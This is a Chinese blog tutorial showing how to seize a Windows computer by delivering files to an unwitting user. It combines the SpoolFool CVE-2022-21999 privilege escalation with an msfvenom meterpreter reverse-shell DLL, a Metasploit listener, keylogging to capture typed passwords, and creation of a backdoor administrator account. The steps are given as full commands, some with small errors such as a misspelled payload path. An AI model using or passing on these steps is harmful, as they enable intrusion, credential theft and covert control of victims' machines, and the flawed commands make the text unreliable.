如何通过一个exe文件远程控制整台计算机？

作者：FancyPig | 发布时间：2022-03-24 13:29:35 | 更新时间：2023-02-05 17:15:15

相关阅读

我们已经分享了很多期远程控制的教程

data-postsbox="{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}">{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}

data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的？反弹shell了解一下！","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的？反弹shell了解一下！","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}

data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件远程控制整台计算机？","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}

data-postsbox="{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}">{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}

data-postsbox="{"id":10680,"title":"黑客是如何黑进手机摄像头？CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}">{"id":10680,"title":"黑客是如何黑进手机摄像头？CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}

今天我们带来一期通过一个exe文件控制整台windows电脑的教程

视频讲解

以下教程主要基于最新的CVE-2022-21999漏洞，利用Windows Print Spooler 特权提升漏洞 (LPE)，在远程控制windows电脑后可以完成权限的提升，拿到管理员权限从而完整的控制计算机。

图文讲解

本期视频主要的两大步骤

文件投递给用户
通过文件进行反弹shell

我们需要下载SpoolFool.exe文件，您也可以👉点这里快速访问

打开链接之后，点击Download即可下载

然后，我们需要使用msfvenom来创建一个恶意payload的文件来完成反弹shell

其中LHOST为你的kali linux的IP地址、LPORT为你kali linux将要监听的端口，>生成文件名可以任意，但要以.dll结尾

msfvenom -p windwos/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.0.192 LPORT=4444 >hackerloi.dll

这里可以看到已经生成好了

然后就可以进行投递了，这里假设用户不小心下载了这两个文件

然后，我们需要在kali linux里启动metasploit渗透框架的监听器

sudo msfconsole

然后输入

use exploit/multi/handler

设置我们要使用的payload

set payload windows/x64/meterpreter/reverse_tcp

输入下面命令查看我们可以输入的参数

show options

这里可以看到LHOST还没有填写，因此我们需要设置一下

设置LHOST为我们kali linux的IP地址

set LHOST 192.168.0.192

都设置好了，我们就可以运行了

run

现在我们只需要等待用户打开文件，就可以连上了

windows用户需要在cmd里输入下面的命令（有人可能会说，用户被远控了，怎么会输入命令呢，那你也可以自己写个.bat的脚本，这里就需要大家自我发挥了，很刑的自己研究咯，我们这里只讲解最原始的）

SpoolFool.exe -dll hackerloi.dll

运行完成上面的命令后，会发现提示

我们回到kali linux，发现已经可以输入命令了

譬如输入sysinfo，我们就可以看到windows系统的信息了

然后，我们可以输入ps查看全部进程，这里可以看到

同时我们可以转移进程，我们设置4548进程来完成键盘的监听

migrate 4548
keyscan_start

那么接下来用户使用键盘输入的任何字符，我们都可以看到了，譬如用户在登录浏览器时输入的用户名和密码

这里windows用户，在被控后，随便输入一个密码，12345678

然后，我们在kali linux上就可以看到了

keyscan_dump

是不是很神奇！这才哪儿到哪儿，如果想提升用户权限，新建一个用户到管理员组中怎么操作呢？

我们只需要在kali linux中输入对应的命令，先创建一个用户名为mrhackerloi密码为12345678的用户

net user mrhackerloi 12345678 /add

然后，再给他提升用户组权限到administrator就成管理员了

net localgroup administrator mrhackerloi /add

然后，回到windows，见证奇迹的时刻，你可以看到这里居然多出了一个用户，而且是管理员身份。

我们可以尝试切换登录，输入密码

发现成功登录上了

今天的教程你学到了吗？

标签：远程控制, windows, 远控, 远控软件, 远控exe, 远控dll, CVE-2022-21999, Windows最新提权, windows提权, windows提权方法, windows提权工具, Windows提权漏洞

如何通过一个exe文件远程控制整台计算机？

相关声明

相关阅读

视频讲解

相关工具

图文讲解